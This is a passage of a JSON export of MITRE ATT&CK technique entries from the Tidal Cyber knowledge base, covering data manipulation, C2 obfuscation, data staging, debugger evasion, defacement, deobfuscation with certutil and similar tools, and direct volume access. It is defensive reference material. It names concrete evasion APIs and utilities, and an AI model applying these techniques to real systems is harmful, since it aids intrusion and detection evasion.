"description": "Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.<sup>[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)]</sup><sup>[[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)]</sup> By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1565.001"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "d693ca8a-dacf-439e-a16b-5f6b3406a21d",
"value": "Stored Data Manipulation"
},
{
"description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.<sup>[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)]</sup><sup>[[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)]</sup> By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1565.002"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "70365fab-8531-4a0e-b147-7cabdfdef243",
"value": "Transmitted Data Manipulation"
},
{
"description": "Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
},
{
"dest-uuid": "3ec6bb34-4134-40c3-8b67-c0aeceae4471",
"type": "similar"
},
{
"dest-uuid": "d693ca8a-dacf-439e-a16b-5f6b3406a21d",
"type": "similar"
},
{
"dest-uuid": "70365fab-8531-4a0e-b147-7cabdfdef243",
"type": "similar"
}
],
"uuid": "b77f03e8-f7d0-4d0f-8b79-4642d0fe2709",
"value": "Data Manipulation"
},
{
"description": "Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1001.001"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "584d1c76-7da9-4374-87df-e622d78fc270",
"value": "Junk Data"
},
{
"description": "Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic. \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1001.003"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "eb15320a-cd24-45b2-b23f-05ef8daf1039",
"value": "Protocol Impersonation"
},
{
"description": "Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1001.002"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "2735f8d1-0e46-4cd7-bfbb-78941bb266fd",
"value": "Steganography - Duplicate"
},
{
"description": "Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
},
{
"dest-uuid": "584d1c76-7da9-4374-87df-e622d78fc270",
"type": "similar"
},
{
"dest-uuid": "eb15320a-cd24-45b2-b23f-05ef8daf1039",
"type": "similar"
},
{
"dest-uuid": "2735f8d1-0e46-4cd7-bfbb-78941bb266fd",
"type": "similar"
}
],
"uuid": "57f95410-5735-43ae-9fec-8b628a7df985",
"value": "Data Obfuscation"
},
{
"description": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.\n\nAdversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.<sup>[[Prevailion DarkWatchman 2021](https://app.tidalcyber.com/references/449e7b5c-7c62-4a63-a676-80026a597fc9)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1074.001"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "8e32b6ed-58b1-4708-8b86-bd29c3a544d2",
"value": "Local Data Staging"
},
{
"description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and stage data in that instance.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1074.002"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "cf76b79c-8226-4137-b3dd-8f516611b928",
"value": "Remote Data Staging"
},
{
"description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.<sup>[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)]</sup>\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and stage data in that instance.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
},
{
"dest-uuid": "8e32b6ed-58b1-4708-8b86-bd29c3a544d2",
"type": "similar"
},
{
"dest-uuid": "cf76b79c-8226-4137-b3dd-8f516611b928",
"type": "similar"
}
],
"uuid": "ef4ef020-5cd1-4859-902b-f207828a1281",
"value": "Data Staged"
},
{
"description": "An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "dc98c882-8fba-4a10-bc6f-43088edb87af",
"value": "Data Transfer Size Limits"
},
{
"description": "Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.<sup>[[ProcessHacker Github](https://app.tidalcyber.com/references/3fc82a92-cfba-405d-b30e-22eba69ab1ee)]</sup>\n\nDebugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.\n\nSpecific checks will vary based on the target and/or adversary, but may involve [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).<sup>[[hasherezade debug](https://app.tidalcyber.com/references/53b0c71d-c577-40e8-8a04-9de083e276a2)]</sup><sup>[[AlKhaser Debug](https://app.tidalcyber.com/references/d9773aaf-e3ec-4ce3-b5c8-1ca3c4751622)]</sup><sup>[[vxunderground debug](https://app.tidalcyber.com/references/8c7fe2a2-64a1-4680-a4e6-f6eefe00407a)]</sup>\n\nAdversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function calls such as <code>OutputDebugStringW()</code>.<sup>[[wardle evilquest partii](https://app.tidalcyber.com/references/4fee237c-c2ec-47f5-b382-ec6bd4779281)]</sup><sup>[[Checkpoint Dridex Jan 2021](https://app.tidalcyber.com/references/a988084f-1a58-4e5b-a616-ed31d311cccf)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "945c1564-6c13-4baa-b1d4-6ba82e06a897",
"value": "Debugger Evasion"
},
{
"description": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://app.tidalcyber.com/technique/26db57d5-ce6f-4487-a8a8-b4af1c4b6406) may ultimately cause users to distrust the systems and to question/discredit the systems integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.<sup>[[FireEye Cyber Threats to Media Industries](https://app.tidalcyber.com/references/7b9bd753-01b7-4923-9964-19c59123ace2)]</sup><sup>[[Kevin Mandia Statement to US Senate Committee on Intelligence](https://app.tidalcyber.com/references/c40a3f96-75f4-4b1c-98a5-cb38129c6dc4)]</sup><sup>[[Anonymous Hackers Deface Russian Govt Site](https://app.tidalcyber.com/references/ca63ccd4-8c81-4de6-8eb4-06a6c68ce4d3)]</sup> [External Defacement](https://app.tidalcyber.com/technique/26db57d5-ce6f-4487-a8a8-b4af1c4b6406) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381).<sup>[[Trend Micro Deep Dive Into Defacement](https://app.tidalcyber.com/references/4886418b-3a2e-4f12-b91e-3bb2a8134112)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1491.002"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "26db57d5-ce6f-4487-a8a8-b4af1c4b6406",
"value": "External Defacement"
},
{
"description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.<sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup> Disturbing or offensive images may be used as a part of [Internal Defacement](https://app.tidalcyber.com/technique/546a3318-0e03-4b22-95f5-c02ff69a4ebf) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.<sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1491.001"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "546a3318-0e03-4b22-95f5-c02ff69a4ebf",
"value": "Internal Defacement"
},
{
"description": "Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b) in order to cause user discomfort, or to pressure compliance with accompanying messages. \n",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
},
{
"dest-uuid": "26db57d5-ce6f-4487-a8a8-b4af1c4b6406",
"type": "similar"
},
{
"dest-uuid": "546a3318-0e03-4b22-95f5-c02ff69a4ebf",
"type": "similar"
}
],
"uuid": "9a21c7c7-cf8e-4f05-b196-86ec39653e3b",
"value": "Defacement"
},
{
"description": "Adversaries may use [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) to decode a remote access tool portable executable file that has been hidden inside a certificate file.<sup>[[Malwarebytes Targeted Attack against Saudi Arabia](https://app.tidalcyber.com/references/735647f9-9cd4-4a20-8812-4671a3358e46)]</sup> Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload.<sup>[[Carbon Black Obfuscation Sept 2016](https://app.tidalcyber.com/references/bed8ae68-9738-46fb-abc9-0004fa35636a)]</sup>\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. <sup>[[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "88c2fb46-877a-4005-8425-7639d0da1920",
"value": "Deobfuscate/Decode Files or Information"
},
{
"description": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.\n\nContainers can be deployed by various means, such as via Docker's <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow.<sup>[[Docker Containers API](https://app.tidalcyber.com/references/2351cb32-23d6-4557-9c52-e6e228402bab)]</sup><sup>[[Kubernetes Dashboard](https://app.tidalcyber.com/references/02f23351-df83-4aae-a0bd-614ed91bc683)]</sup><sup>[[Kubeflow Pipelines](https://app.tidalcyber.com/references/0b40474c-173c-4a8c-8cc7-bac2dcfcaedd)]</sup> Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.<sup>[[Aqua Build Images on Hosts](https://app.tidalcyber.com/references/efd64f41-13cc-4b2b-864c-4d2352cdadcd)]</sup>",
"meta": {
"platforms": [
"Containers"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "2618638c-f6bd-4840-a297-c45076e094a9",
"value": "Deploy Container"
},
{
"description": "Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.<sup>[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)]</sup> Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), adversaries may develop self-signed code signing certificates for use in operations.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1587.002"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "6f152555-36a5-4ec9-8b9b-f0b32c3ccef8",
"value": "Code Signing Certificates - Duplicate"
},
{
"description": "Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).\n\nAdversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)) or even enabling [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) if added to the root of trust (i.e. [Install Root Certificate](https://app.tidalcyber.com/technique/3a956db0-a3f0-442a-a981-db2ee20d60b2)).\n\nAfter creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://app.tidalcyber.com/technique/0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b)) on infrastructure under their control.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1587.003"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "5bcbb0c5-7061-481f-a677-09028a6c59f7",
"value": "Digital Certificates - Duplicate"
},
{
"description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.<sup>[[NYTStuxnet](https://app.tidalcyber.com/references/38b0cf78-88d0-487f-b2b0-81264f457dd0)]</sup> Adversaries may use information acquired via [Vulnerabilities](https://app.tidalcyber.com/technique/fe96475a-3090-449d-91fd-ae73cb4d9c7c) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.<sup>[[Irongeek Sims BSides 2017](https://app.tidalcyber.com/references/ce11568a-36a8-4da2-972f-9cd67cc337d8)]</sup>\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609), [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391), [Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef), [Exploitation of Remote Services](https://app.tidalcyber.com/technique/51ff4ada-8a71-4801-9cb8-a6e216eaa4e4), and [Application or System Exploitation](https://app.tidalcyber.com/technique/2109de05-5b45-4519-94a2-6c04f7d88286)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1587.004"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "5a57d258-0b23-431b-b50e-3150d2c0e52c",
"value": "Exploits - Duplicate"
},
{
"description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup><sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup><sup>[[ActiveMalwareEnergy](https://app.tidalcyber.com/references/f2ef73c6-5d4c-423e-a3f5-194cba121eb1)]</sup><sup>[[FBI Flash FIN7 USB](https://app.tidalcyber.com/references/42dc957c-007b-4f90-88c6-1afd6d1032e8)]</sup>\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://app.tidalcyber.com/technique/2e883e0d-1108-431a-a2dd-98ba98b69417).<sup>[[FireEye APT29](https://app.tidalcyber.com/references/78ead31e-7450-46e8-89cf-461ae1981994)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1587.001"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "0f77a14a-d450-4885-b81f-23eeffa53a7e",
"value": "Malware - Duplicate"
},
{
"description": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup><sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup><sup>[[Bitdefender StrongPity June 2020](https://app.tidalcyber.com/references/7d2e20f2-20ba-4d51-9495-034c07be41a8)]</sup><sup>[[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]</sup>\n\nAs with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
},
{
"dest-uuid": "6f152555-36a5-4ec9-8b9b-f0b32c3ccef8",
"type": "similar"
},
{
"dest-uuid": "5bcbb0c5-7061-481f-a677-09028a6c59f7",
"type": "similar"
},
{
"dest-uuid": "5a57d258-0b23-431b-b50e-3150d2c0e52c",
"type": "similar"
},
{
"dest-uuid": "0f77a14a-d450-4885-b81f-23eeffa53a7e",
"type": "similar"
}
],
"uuid": "bf660248-2098-499b-b90c-8c47efb26c70",
"value": "Develop Capabilities"
},
{
"description": "Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c)).\n\nMany OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.<sup>[[Microsoft Driverquery](https://app.tidalcyber.com/references/7302dc00-a75a-5787-a04c-88ef4922ac09)]</sup><sup>[[Microsoft EnumDeviceDrivers](https://app.tidalcyber.com/references/647ffc70-8eab-5f2f-abf4-9bbf42554043)]</sup> Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://app.tidalcyber.com/technique/e0a347e2-2ac5-458b-ab0f-18d81b6d6055)) may also be available in the Registry.<sup>[[Microsoft Registry Drivers](https://app.tidalcyber.com/references/4bde767e-d4a7-56c5-9aa3-b3f3cc2e3e70)]</sup>\n\nOn Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.<sup>[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)]</sup><sup>[[lsmod man](https://app.tidalcyber.com/references/c2f88274-9da4-5d24-b68d-302ee5990dd5)]</sup><sup>[[modinfo man](https://app.tidalcyber.com/references/d4f2db5c-ef6d-556d-a5e2-f6738277fecd)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "70ffc700-eb9b-54d7-8fd4-564bd71a6434",
"value": "Device Driver Discovery"
},
{
"description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. <sup>[[Hakobyan 2009](https://app.tidalcyber.com/references/d92f6dc0-e902-4a4a-9083-8d1667a7003e)]</sup>\n\nUtilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.<sup>[[Github PowerSploit Ninjacopy](https://app.tidalcyber.com/references/e92aed6b-348b-4dab-8292-fee0698e4a85)]</sup> Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://app.tidalcyber.com/software/a7589733-6b04-4215-a4e7-4b62cd4610fa)) to create shadow copies or backups of data from system volumes.<sup>[[LOLBAS Esentutl](https://app.tidalcyber.com/references/691b4907-3544-4ad0-989c-b5c845e0330f)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "447f1d32-31f7-44b5-834a-dcba8b038e7f",
"value": "Direct Volume Access"
},
{
